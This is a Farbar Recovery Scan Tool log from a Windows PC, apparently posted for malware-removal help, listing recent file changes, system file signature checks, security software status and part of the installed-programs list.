    2014-12-30 20:03 - 2014-12-30 20:03 - 00081088 _____ () C:\Users\NorMac\Downloads\51.zip
    2014-12-30 20:01 - 2014-12-30 20:01 - 00626823 _____ () C:\Users\NorMac\Downloads\188.zip
    2014-12-30 19:47 - 2014-12-30 19:47 - 00317699 _____ () C:\Users\NorMac\Downloads\1737_children_ppt.zip
    2014-12-30 19:47 - 2014-12-30 19:47 - 00242204 _____ () C:\Users\NorMac\Downloads\881_puppies walking blue_ppt.zip
    2014-12-30 19:47 - 2014-12-30 19:47 - 00191683 _____ () C:\Users\NorMac\Downloads\1992_turtle_ppt.zip
    2014-12-30 19:46 - 2014-12-30 19:46 - 00549822 _____ () C:\Users\NorMac\Downloads\1791_childhood_ppt.zip
    2014-12-30 19:44 - 2014-12-30 19:45 - 00296313 _____ () C:\Users\NorMac\Downloads\846_twitter_ppt.zip
    2014-12-30 19:42 - 2014-12-30 19:42 - 00316625 _____ () C:\Users\NorMac\Downloads\329_white_horse_ppt.zip
    2014-12-29 21:00 - 2014-12-29 21:00 - 13087456 _____ (Microsoft Corporation) C:\Users\NorMac\Downloads\Silverlight_x64 (2).exe
    2014-12-29 20:56 - 2014-12-29 20:56 - 00079991 _____ () C:\Users\NorMac\Downloads\silverlight.diagcab
    2014-12-28 22:43 - 2014-12-29 21:08 - 00003344 _____ () C:\WINDOWS\System32\Tasks\RealPlayerRealUpgradeScheduledTaskS-1-5-21-485173556-832918840-2370493585-1000
    2014-12-28 22:43 - 2014-12-29 21:08 - 00003212 _____ () C:\WINDOWS\System32\Tasks\RealPlayerRealUpgradeLogonTaskS-1-5-21-485173556-832918840-2370493585-1000
    2014-12-28 19:39 - 2014-12-28 15:16 - 00000000 __SHD () C:\Jumpshot
    2014-12-28 19:37 - 2014-12-28 22:36 - 00000000 ____D () C:\WINDOWS\jumpshot.com
    2014-12-26 20:17 - 2014-12-26 20:44 - 00000247 _____ () C:\WINDOWS\system32\2014-12-27-01-17-00.093-aswFe.exe-1596.log
    2014-12-26 20:16 - 2014-12-26 20:16 - 00000197 _____ () C:\WINDOWS\system32\2014-12-27-01-16-49.018-AvastVBoxSVC.exe-11984.log
    2014-12-26 15:23 - 2014-12-26 15:37 - 00000247 _____ () C:\WINDOWS\system32\2014-12-26-20-23-30.049-aswFe.exe-13796.log
    2014-12-26 15:22 - 2014-12-26 15:22 - 00000197 _____ () C:\WINDOWS\system32\2014-12-26-20-22-43.029-AvastVBoxSVC.exe-6888.log
    2014-12-26 14:13 - 2014-12-26 14:22 - 00000247 _____ () C:\WINDOWS\system32\2014-12-26-19-13-36.033-aswFe.exe-14272.log
    2014-12-26 14:13 - 2014-12-26 14:13 - 00000197 _____ () C:\WINDOWS\system32\2014-12-26-19-13-29.055-AvastVBoxSVC.exe-4232.log
    2014-12-25 15:36 - 2014-12-25 15:37 - 00000197 _____ () C:\WINDOWS\system32\2014-12-25-20-36-08.072-AvastVBoxSVC.exe-3668.log
    2014-12-25 15:35 - 2014-11-26 16:11 - 00714184 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe
    2014-12-25 15:35 - 2014-11-26 16:11 - 00106440 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl
    2014-12-25 15:10 - 2014-12-25 15:19 - 00000000 ____D () C:\WINDOWS\system32\MRT
    2014-12-25 15:08 - 2014-10-08 23:00 - 01519104 _____ (Microsoft Corporation) C:\WINDOWS\system32\vssapi.dll
    2014-12-25 15:08 - 2014-10-08 23:00 - 01484288 _____ (Microsoft Corporation) C:\WINDOWS\system32\VSSVC.exe
    2014-12-25 15:08 - 2014-10-08 23:00 - 00069632 _____ (Microsoft Corporation) C:\WINDOWS\system32\vsstrace.dll
    2014-12-25 15:08 - 2014-10-08 22:59 - 01195520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vssapi.dll
    2014-12-25 15:08 - 2014-10-08 22:59 - 00052224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vsstrace.dll
    2014-12-25 12:06 - 2014-12-25 12:07 - 00000197 _____ () C:\WINDOWS\system32\2014-12-25-17-06-44.062-AvastVBoxSVC.exe-4776.log
    2014-12-24 18:51 - 2014-12-24 18:53 - 00000000 ____D () C:\Users\NorMac\AppData\Roaming\EPIM-Outlook Sync
    2014-12-24 18:50 - 2014-12-24 18:50 - 00000849 _____ () C:\Users\Public\Desktop\EPIM-Outlook Sync.lnk
    2014-12-24 18:50 - 2014-12-24 18:50 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\EPIM-Outlook Sync
    2014-12-24 18:50 - 2014-12-24 18:50 - 00000000 ____D () C:\Program Files\EPIM-Outlook Sync
    2014-12-24 18:11 - 2014-12-24 18:11 - 00000000 ____D () C:\Users\NorMac\Documents\NorMac
    2014-12-24 17:34 - 2014-12-24 17:34 - 16227712 _____ () C:\Users\NorMac\Downloads\EssentialPIMPro6(1).exe
    2014-12-24 16:51 - 2014-12-24 16:53 - 00000197 _____ () C:\WINDOWS\system32\2014-12-24-21-51-58.024-AvastVBoxSVC.exe-3700.log
    2014-12-23 08:51 - 2014-12-23 08:51 - 00000197 _____ () C:\WINDOWS\system32\2014-12-23-13-51-00.058-AvastVBoxSVC.exe-4720.log
    2014-12-22 18:08 - 2014-12-22 18:10 - 00000197 _____ () C:\WINDOWS\system32\2014-12-22-23-08-39.021-AvastVBoxSVC.exe-3512.log
    2014-12-21 17:51 - 2014-12-21 17:51 - 00000247 _____ () C:\WINDOWS\system32\2014-12-21-22-51-14.079-aswFe.exe-5972.log
    2014-12-21 17:45 - 2014-12-21 17:50 - 00000247 _____ () C:\WINDOWS\system32\2014-12-21-22-45-52.048-aswFe.exe-9344.log
    2014-12-21 17:45 - 2014-12-21 17:45 - 00000197 _____ () C:\WINDOWS\system32\2014-12-21-22-45-50.034-AvastVBoxSVC.exe-8124.log
    2014-12-20 21:34 - 2014-12-20 21:35 - 00000247 _____ () C:\WINDOWS\system32\2014-12-21-02-34-57.092-aswFe.exe-5748.log
    2014-12-20 21:30 - 2014-12-20 21:34 - 00000247 _____ () C:\WINDOWS\system32\2014-12-21-02-30-36.025-aswFe.exe-5252.log
    2014-12-20 21:30 - 2014-12-20 21:30 - 00000197 _____ () C:\WINDOWS\system32\2014-12-21-02-30-32.062-AvastVBoxSVC.exe-4584.log
    2014-12-20 15:20 - 2014-12-20 15:23 - 00000000 ____D () C:\WINDOWS\SysWOW64\vbox
    2014-12-20 15:20 - 2014-12-20 15:23 - 00000000 ____D () C:\WINDOWS\system32\vbox
    2014-12-20 10:58 - 2014-12-20 10:58 - 00001928 _____ () C:\Users\Public\Desktop\Avast Free Antivirus.lnk
    2014-12-20 10:58 - 2014-12-20 10:57 - 00364512 _____ (AVAST Software) C:\WINDOWS\system32\aswBoot.exe
    2014-12-20 10:57 - 2014-12-20 10:57 - 00043152 _____ (AVAST Software) C:\WINDOWS\avastSS.scr
    2014-12-19 10:27 - 2014-12-30 18:26 - 00000000 ____D () C:\Users\NorMac\Downloads\NY Cooperative Loan Recognition Agreement_files
    2014-12-19 10:27 - 2014-12-19 10:27 - 00026190 _____ () C:\Users\NorMac\Downloads\NY Cooperative Loan Recognition Agreement.html
    2014-12-17 14:04 - 2014-12-17 14:04 - 02166272 _____ () C:\Users\NorMac\Downloads\adwcleaner_4.105.exe
    2014-12-16 22:49 - 2014-12-23 20:33 - 00065536 ____H () C:\Users\NorMac\Documents\~Outlook-12345.pst.tmp
    2014-12-16 22:34 - 2014-12-31 21:42 - 00000000 ____D () C:\Users\NorMac\AppData\Roaming\EssentialPIM Pro
    2014-12-16 22:34 - 2014-12-24 18:22 - 00001087 _____ () C:\Users\Public\Desktop\EssentialPIM Pro.lnk
    2014-12-16 22:34 - 2014-12-16 22:34 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\EssentialPIM Pro
    2014-12-16 22:34 - 2014-12-16 22:34 - 00000000 ____D () C:\Program Files (x86)\EssentialPIM Pro
    2014-12-16 22:32 - 2014-12-16 22:32 - 16279040 _____ () C:\Users\NorMac\Downloads\EssentialPIMPro6.exe
    2014-12-16 21:10 - 2014-12-16 21:10 - 00012540 _____ () C:\Users\NorMac\Documents\cc_20141216_211001.reg
    2014-12-10 09:59 - 2014-12-10 09:59 - 00085862 _____ () C:\Users\NorMac\Documents\cc_20141210_095952.reg
    2014-12-10 09:39 - 2014-11-21 03:38 - 02237952 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
    2014-12-10 09:39 - 2014-11-21 03:38 - 00051712 _____ (Microsoft Corporation) C:\WINDOWS\system32\ie4uinit.exe
    2014-12-10 09:39 - 2014-11-21 03:37 - 01409536 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
    2014-12-10 09:39 - 2014-11-21 03:37 - 00915968 _____ (Microsoft Corporation) C:\WINDOWS\system32\uxtheme.dll
    2014-12-10 09:39 - 2014-11-21 03:37 - 00053760 _____ (Microsoft Corporation) C:\WINDOWS\system32\UXInit.dll
    2014-12-10 09:39 - 2014-11-21 03:36 - 19283456 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
    2014-12-10 09:39 - 2014-11-21 03:36 - 15400960 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
    2014-12-10 09:39 - 2014-11-21 03:36 - 03959296 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
    2014-12-10 09:39 - 2014-11-21 03:36 - 02655232 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
    2014-12-10 09:39 - 2014-11-21 03:36 - 00855552 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript.dll
    2014-12-10 09:39 - 2014-11-21 03:36 - 00603136 _____ (Microsoft Corporation) C:\WINDOWS\system32\msfeeds.dll
    2014-12-10 09:39 - 2014-11-21 03:36 - 00451584 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxtmsft.dll
    2014-12-10 09:39 - 2014-11-21 03:36 - 00281600 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxtrans.dll
    2014-12-10 09:39 - 2014-11-21 03:36 - 00255488 _____ (Microsoft Corporation) C:\WINDOWS\system32\iedkcs32.dll
    2014-12-10 09:39 - 2014-11-21 03:36 - 00197120 _____ (Microsoft Corporation) C:\WINDOWS\system32\msrating.dll
    2014-12-10 09:39 - 2014-11-21 03:36 - 00136704 _____ (Microsoft Corporation) C:\WINDOWS\system32\iesysprep.dll
    2014-12-10 09:39 - 2014-11-21 03:36 - 00097280 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtmled.dll
    2014-12-10 09:39 - 2014-11-21 03:36 - 00067072 _____ (Microsoft Corporation) C:\WINDOWS\system32\iesetup.dll
    2014-12-10 09:39 - 2014-11-21 03:36 - 00053760 _____ (Microsoft Corporation) C:\WINDOWS\system32\jsproxy.dll
    2014-12-10 09:39 - 2014-11-21 03:36 - 00039936 _____ (Microsoft Corporation) C:\WINDOWS\system32\iernonce.dll
    2014-12-10 09:39 - 2014-11-21 03:35 - 01509376 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcpl.cpl
    2014-12-10 09:39 - 2014-11-21 02:17 - 01762816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
    2014-12-10 09:39 - 2014-11-21 02:17 - 01181696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
    2014-12-10 09:39 - 2014-11-21 02:17 - 00163840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msrating.dll
    2014-12-10 09:39 - 2014-11-21 02:17 - 00080384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtmled.dll
    2014-12-10 09:39 - 2014-11-21 02:17 - 00044032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UXInit.dll
    2014-12-10 09:39 - 2014-11-21 02:16 - 13758976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
    2014-12-10 09:39 - 2014-11-21 02:16 - 02054656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
    2014-12-10 09:39 - 2014-11-21 02:16 - 01441280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcpl.cpl
    2014-12-10 09:39 - 2014-11-21 02:16 - 00690688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript.dll
    2014-12-10 09:39 - 2014-11-21 02:16 - 00493056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msfeeds.dll
    2014-12-10 09:39 - 2014-11-21 02:16 - 00357888 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxtmsft.dll
    2014-12-10 09:39 - 2014-11-21 02:16 - 00226816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iedkcs32.dll
    2014-12-10 09:39 - 2014-11-21 02:16 - 00226816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxtrans.dll
    2014-12-10 09:39 - 2014-11-21 02:16 - 00109056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iesysprep.dll
    2014-12-10 09:39 - 2014-11-21 02:16 - 00061440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iesetup.dll
    2014-12-10 09:39 - 2014-11-21 02:16 - 00039936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jsproxy.dll
    2014-12-10 09:39 - 2014-11-21 02:16 - 00033280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iernonce.dll
    2014-12-10 09:39 - 2014-11-21 02:00 - 02706432 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.tlb
    2014-12-10 09:39 - 2014-11-21 01:54 - 02706432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.tlb
    2014-12-10 09:39 - 2014-11-20 23:30 - 00534528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\uxtheme.dll
    2014-12-10 09:39 - 2014-10-11 02:44 - 19764736 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
    2014-12-10 09:39 - 2014-10-11 00:57 - 17562112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
    2014-12-10 09:39 - 2014-10-08 22:59 - 00623616 _____ (Microsoft Corporation) C:\WINDOWS\system32\dnsapi.dll
    2014-12-10 09:39 - 2014-10-08 22:59 - 00212992 _____ (Microsoft Corporation) C:\WINDOWS\system32\dnsrslvr.dll
    2014-12-10 09:39 - 2014-10-08 22:58 - 00458240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dnsapi.dll
    2014-12-10 09:39 - 2014-09-22 00:38 - 00673792 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmpeg2srcsnk.dll
    2014-12-10 09:39 - 2014-09-21 22:56 - 00513536 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmpeg2srcsnk.dll
    2014-12-10 09:39 - 2014-09-17 18:24 - 00987136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\srmclient.dll
    2014-12-10 09:39 - 2014-09-17 18:24 - 00487936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\srmscan.dll
    2014-12-10 09:39 - 2014-09-17 18:24 - 00278528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\srm.dll
    2014-12-10 09:39 - 2014-09-17 18:24 - 00104448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\adrclient.dll
    2014-12-10 09:39 - 2014-09-17 17:57 - 01346560 _____ (Microsoft Corporation) C:\WINDOWS\system32\srmclient.dll
    2014-12-10 09:39 - 2014-09-17 17:57 - 00652800 _____ (Microsoft Corporation) C:\WINDOWS\system32\srmscan.dll
    2014-12-10 09:39 - 2014-09-17 17:57 - 00279040 _____ (Microsoft Corporation) C:\WINDOWS\system32\srm.dll
    2014-12-10 09:39 - 2014-09-17 17:57 - 00134144 _____ (Microsoft Corporation) C:\WINDOWS\system32\adrclient.dll
    2014-12-10 09:38 - 2014-11-21 02:17 - 14364672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
    2014-12-10 09:38 - 2014-11-21 02:16 - 02861568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
    2014-12-10 09:38 - 2014-11-06 01:50 - 01627648 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowsCodecs.dll
    2014-12-10 09:38 - 2014-11-06 00:03 - 01339392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WindowsCodecs.dll
    2014-12-08 22:56 - 2014-12-08 22:56 - 00000000 ____D () C:\Program Files (x86)\Mozilla Firefox
    2014-12-07 12:31 - 2014-12-17 14:10 - 00000000 ____D () C:\AdwCleaner
    2014-12-07 12:31 - 2014-12-07 12:31 - 00000055 _____ () C:\AdwCleanerDebug.txt
    2014-12-06 23:35 - 2014-12-06 23:54 - 00000000 ____D () C:\ProgramData\Malwarebytes' Anti-Malware (portable)
    2014-12-06 23:30 - 2014-12-17 13:55 - 00096472 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\mbamchameleon.sys
    2014-12-06 23:30 - 2014-12-17 13:55 - 00000000 ____D () C:\Users\NorMac\Desktop\mbar
    2014-12-06 23:29 - 2014-12-06 23:29 - 01944824 _____ (Bleeping Computer, LLC) C:\Users\NorMac\Downloads\rkill.exe
    2014-12-06 23:28 - 2014-12-06 23:29 - 01707646 _____ (Thisisu) C:\Users\NorMac\Downloads\JRT (1).exe
    2014-12-06 23:02 - 2014-12-06 23:02 - 00001069 _____ () C:\Users\NorMac\Documents\checkup.txt
    2014-12-06 09:56 - 2014-12-06 09:56 - 00002008 _____ () C:\Users\Public\Desktop\HP Print and Scan Doctor.lnk
    2014-12-06 09:34 - 2014-12-06 09:34 - 00003618 _____ () C:\WINDOWS\System32\Tasks\HPCustParticipation HP Officejet Pro 8610
    2014-12-06 09:33 - 2014-12-06 09:33 - 00002164 _____ () C:\Users\Public\Desktop\HP Officejet Pro 8610.lnk
    2014-12-06 09:33 - 2014-03-06 12:51 - 00763912 ____N (Hewlett-Packard Co.) C:\WINDOWS\system32\HPDiscoPM7112.dll

    ==================== One Month Modified Files and Folders =======

    (If an entry is included in the fixlist, the file\folder will be moved.)

    2015-01-04 09:04 - 2013-05-10 10:44 - 00000926 _____ () C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
    2015-01-04 09:02 - 2013-05-01 19:34 - 00000000 ____D () C:\Users\NorMac\AppData\Local\CrashDumps
    2015-01-04 09:00 - 2012-07-26 03:12 - 00000000 ____D () C:\WINDOWS\system32\sru
    2015-01-04 08:32 - 2012-07-26 02:28 - 00852298 _____ () C:\WINDOWS\system32\PerfStringBackup.INI
    2015-01-04 08:29 - 2013-02-28 12:24 - 00000000 ____D () C:\Program Files\SUPERAntiSpyware
    2015-01-03 23:28 - 2014-07-26 10:58 - 00000588 _____ () C:\WINDOWS\Tasks\G2MUpdateTask-S-1-5-21-485173556-832918840-2370493585-1000.job
    2015-01-03 22:34 - 2012-12-19 04:36 - 00003594 _____ () C:\WINDOWS\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-485173556-832918840-2370493585-1000
    2015-01-03 22:32 - 2014-06-10 12:45 - 00004182 _____ () C:\WINDOWS\System32\Tasks\avast! Emergency Update
    2015-01-03 22:30 - 2013-05-10 10:44 - 00000922 _____ () C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
    2015-01-03 22:29 - 2012-07-26 02:22 - 00000006 ____H () C:\WINDOWS\Tasks\SA.DAT
    2015-01-02 09:03 - 2013-09-14 10:47 - 00000000 ____D () C:\Users\NorMac\AppData\Roaming\mjusbsp
    2015-01-02 09:03 - 2013-09-14 10:39 - 00000985 _____ () C:\Users\NorMac\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\magicJack.lnk
    2015-01-01 20:36 - 2012-12-19 04:11 - 00000000 ____D () C:\Users\NorMac
    2015-01-01 20:28 - 2014-10-06 20:30 - 00000000 ____D () C:\Program Files (x86)\CyberLink
    2015-01-01 20:28 - 2014-10-06 20:21 - 00000000 ____D () C:\ProgramData\SUPPORTDIR
    2015-01-01 20:28 - 2013-02-11 18:34 - 00000000 ___HD () C:\Program Files (x86)\InstallShield Installation Information
    2015-01-01 20:21 - 2013-08-07 19:49 - 00000000 ____D () C:\ProgramData\Apple
    2015-01-01 13:22 - 2013-02-04 18:35 - 01111552 ___SH () C:\Users\NorMac\Downloads\Thumbs.db
    2014-12-31 22:28 - 2013-04-28 12:58 - 00000000 ____D () C:\Users\NorMac\Desktop\4-X-13 TO DO FOLDER
    2014-12-31 22:19 - 2013-01-14 19:42 - 00000000 ____D () C:\ProgramData\Western Digital
    2014-12-31 22:13 - 2013-09-09 14:54 - 00000000 ____D () C:\Users\NorMac\AppData\Roaming\Audacity
    2014-12-30 18:39 - 2012-12-20 01:00 - 02285056 ___SH () C:\Users\NorMac\Desktop\Thumbs.db
    2014-12-30 18:26 - 2014-10-23 11:43 - 00000000 ____D () C:\Users\NorMac\Downloads\Ansonia-Milford JD Directions - CT Judicial Branch_files
    2014-12-30 17:20 - 2012-11-09 13:01 - 00000000 ____D () C:\Users\NorMac\Documents\9-Sony IC recorder files
    2014-12-28 20:15 - 2012-12-19 04:11 - 06815744 ___SH () C:\Users\NorMac\.ghost-ntfs-3g-00000000000000000013
    2014-12-28 20:15 - 2012-07-26 00:26 - 95944704 _____ () C:\WINDOWS\system32\config\.ghost-ntfs-3g-00000000000000000001
    2014-12-28 20:15 - 2012-07-26 00:26 - 34603008 _____ () C:\WINDOWS\system32\config\.ghost-ntfs-3g-00000000000000000003
    2014-12-26 13:55 - 2012-07-26 02:59 - 00000000 ____D () C:\WINDOWS\CbsTemp
    2014-12-25 17:36 - 2014-10-14 16:30 - 00000000 ____D () C:\Users\NorMac\AppData\Roaming\vlc
    2014-12-25 15:35 - 2013-07-10 15:32 - 00000884 __RSH () C:\Users\NorMac\ntuser.pol
    2014-12-25 15:27 - 2012-07-26 03:12 - 00000000 ___RD () C:\WINDOWS\ToastData
    2014-12-25 15:27 - 2012-07-26 03:12 - 00000000 ___RD () C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools
    2014-12-25 15:27 - 2012-07-26 03:12 - 00000000 ___RD () C:\Users\Default User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools
    2014-12-25 15:27 - 2012-07-26 03:12 - 00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories
    2014-12-25 15:27 - 2012-07-26 03:12 - 00000000 ____D () C:\Program Files\Windows Defender
    2014-12-25 15:27 - 2012-07-26 03:12 - 00000000 ____D () C:\Program Files (x86)\Windows Defender
    2014-12-25 15:22 - 2012-12-20 00:30 - 00000000 ____D () C:\ProgramData\Microsoft Help
    2014-12-24 16:34 - 2014-02-06 22:11 - 2011317248 _____ () C:\Users\NorMac\Documents\Outlook-12345.pst
    2014-12-24 16:19 - 2014-07-26 10:58 - 00003592 _____ () C:\WINDOWS\System32\Tasks\G2MUpdateTask-S-1-5-21-485173556-832918840-2370493585-1000
    2014-12-22 19:09 - 2014-11-10 18:51 - 00000000 ____D () C:\Users\NorMac\AppData\Roaming\EssentialPIM
    2014-12-22 18:44 - 2013-06-07 12:20 - 00000000 ____D () C:\Users\NorMac\Desktop\Sutton Place Properties LLC
    2014-12-21 20:46 - 2012-12-19 17:58 - 00000000 ____D () C:\Users\NorMac\AppData\Local\CutePDF Writer
    2014-12-20 22:05 - 2012-12-20 00:42 - 00000000 ____D () C:\Users\NorMac\AppData\Local\HP
    2014-12-20 15:15 - 2014-02-11 23:54 - 00000000 ____D () C:\Users\NorMac\AppData\Local\NETGEARGenie
    2014-12-20 15:10 - 2012-07-26 00:26 - 00262144 ___SH () C:\WINDOWS\system32\config\BBI
    2014-12-20 10:58 - 2014-06-10 12:45 - 01050432 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswsnx.sys
    2014-12-20 10:57 - 2014-06-10 12:45 - 00436624 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswsp.sys
    2014-12-20 10:57 - 2014-06-10 12:45 - 00267632 _____ () C:\WINDOWS\system32\Drivers\aswVmm.sys
    2014-12-20 10:57 - 2014-06-10 12:45 - 00116728 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswstm.sys
    2014-12-20 10:57 - 2014-06-10 12:45 - 00093568 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswRdr2.sys
    2014-12-20 10:57 - 2014-06-10 12:45 - 00083280 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswMonFlt.sys
    2014-12-20 10:57 - 2014-06-10 12:45 - 00065776 _____ () C:\WINDOWS\system32\Drivers\aswRvrt.sys
    2014-12-20 10:57 - 2014-06-10 12:45 - 00029208 _____ () C:\WINDOWS\system32\Drivers\aswHwid.sys
    2014-12-20 08:12 - 2012-07-26 00:26 - 00262144 ___SH () C:\WINDOWS\system32\config\ELAM
    2014-12-16 20:45 - 2012-12-27 18:49 - 00000000 ____D () C:\WINDOWS\Minidump
    2014-12-16 00:56 - 2013-03-01 08:59 - 00030208 _____ () C:\Users\NorMac\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
    2014-12-14 14:33 - 2012-12-19 18:06 - 00000000 ____D () C:\Users\NorMac\AppData\Local\Adobe
    2014-12-14 10:28 - 2013-02-06 17:44 - 00545792 ___SH () C:\Users\NorMac\Documents\Thumbs.db
    2014-12-12 23:14 - 2013-05-10 10:45 - 00002187 _____ () C:\Users\Public\Desktop\Google Chrome.lnk
    2014-12-12 08:45 - 2012-12-19 04:38 - 00000000 ____D () C:\Program Files (x86)\Mozilla Maintenance Service
    2014-12-09 08:36 - 2012-07-26 03:12 - 00000000 ____D () C:\WINDOWS\AUInstallAgent
    2014-12-07 17:18 - 2014-12-02 21:11 - 00000000 ____D () C:\Program Files (x86)\Mozilla Thunderbird
    2014-12-07 12:50 - 2013-11-20 00:13 - 00001083 _____ () C:\Users\NorMac\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Search.lnk
    2014-12-06 23:35 - 2014-04-08 17:40 - 00135384 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
    2014-12-06 09:56 - 2012-12-20 00:49 - 00000000 ____D () C:\ProgramData\HP
    2014-12-06 09:56 - 2012-12-20 00:49 - 00000000 ____D () C:\Program Files (x86)\HP
    2014-12-06 09:40 - 2012-12-20 00:50 - 00000000 ____D () C:\Users\NorMac\AppData\Roaming\HpUpdate
    2014-12-06 09:35 - 2014-09-25 12:03 - 00000000 ____D () C:\Program Files (x86)\Hewlett-Packard
    2014-12-06 09:34 - 2012-12-20 00:50 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HP
    2014-12-06 09:30 - 2012-12-20 00:49 - 00000000 ____D () C:\Program Files\HP

    ==================== Bamital & volsnap Check =================

    (There is no automatic fix for files that do not pass verification.)

    C:\Windows\System32\winlogon.exe => File is digitally signed
    C:\Windows\System32\wininit.exe => File is digitally signed
    C:\Windows\explorer.exe => File is digitally signed
    C:\Windows\SysWOW64\explorer.exe => File is digitally signed
    C:\Windows\System32\svchost.exe => File is digitally signed
    C:\Windows\SysWOW64\svchost.exe => File is digitally signed
    C:\Windows\System32\services.exe => File is digitally signed
    C:\Windows\System32\User32.dll => File is digitally signed
    C:\Windows\SysWOW64\User32.dll => File is digitally signed
    C:\Windows\System32\userinit.exe => File is digitally signed
    C:\Windows\SysWOW64\userinit.exe => File is digitally signed
    C:\Windows\System32\rpcss.dll => File is digitally signed
    C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed


    LastRegBack: 2015-01-03 03:01

    ==================== End Of Log ============================

    //////////////// (2) ADDITION.TXT REPORT

    Additional scan result of Farbar Recovery Scan Tool (x64) Version: 03-01-2015 03
    Ran by NorMac at 2015-01-04 09:11:36
    Running from C:\Users\NorMac\Downloads
    Boot Mode: Normal
    ==========================================================


    ==================== Security Center ========================

    (If an entry is included in the fixlist, it will be removed.)

    AV: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
    AV: avast! Antivirus (Enabled - Up to date) {17AD7D40-BA12-9C46-7131-94903A54AD8B}
    AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
    AS: Spybot - Search and Destroy (Enabled - Out of date) {9BC38DF1-3CCA-732D-A930-C1CA5F20A4B0}
    AS: avast! Antivirus (Enabled - Up to date) {ACCC9CA4-9C28-93C8-4B81-AFE241D3E736}

    ==================== Installed Programs ======================

    (Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

    64 Bit HP CIO Components Installer (Version: 7.2.8 - Hewlett-Packard) Hidden
    6400_Help (x32 Version: 1.00.0000 - Hewlett-Packard) Hidden
    8GadgetPack (HKLM-x32\...\{DE18940E-5986-480A-8518-7327D14756D3}) (Version: 6.0.0 - Helmut Buhler)
    Adobe Flash Player 16 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 16.0.0.235 - Adobe Systems Incorporated)
    Adobe Reader XI (11.0.03) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.03 - Adobe Systems Incorporated)
    Adobe Shockwave Player 12.0 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.0.2.122 - Adobe Systems, Inc.)
